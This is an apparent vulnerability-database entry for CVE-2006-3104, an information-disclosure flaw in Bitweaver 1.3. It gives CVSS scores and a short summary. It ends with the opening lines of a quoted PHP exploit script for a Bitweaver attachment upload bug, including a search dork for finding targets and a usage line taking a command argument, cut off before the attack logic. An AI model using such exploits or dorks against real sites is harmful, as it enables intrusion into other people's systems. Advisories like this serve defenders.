5
CVSSv2

CVE-2006-3104

Published: 21/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

users/index.php in Bitweaver 1.3 allows remote malicious users to obtain sensitive information via an invalid sort_mode parameter, which reveals the installation path and database information in the resultant error message.

Vulnerable Product Search on Vulmon Subscribe to Product

bitweaver bitweaver 1.3

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "bitweaver <= v13 'tmpImagePath' attachment mod_mime exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"powered by bitweaver\"\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: ...